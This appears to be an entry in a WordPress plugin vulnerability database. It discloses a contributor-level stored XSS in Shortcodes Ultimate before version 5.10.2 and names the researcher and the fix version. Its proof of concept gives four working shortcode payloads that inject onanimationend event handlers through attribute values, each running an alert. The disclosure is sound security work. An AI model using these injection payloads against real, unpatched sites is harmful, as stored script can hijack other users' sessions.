WordPress Plugin Vulnerabilities
Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS
Description
The plugin allows users with Contributor roles to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some do escape, most don't, and there are even some attributes that are insecure by design (like [su_button]'s onclick attribute).
Proof of Concept
[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)'] [su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)'] [su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"] [su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']
Affects Plugins
Fixed in version 5.10.2
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-08-23 (about 1 years ago)
Added
2021-08-23 (about 1 years ago)
Last Updated
2022-03-07 (about 9 months ago)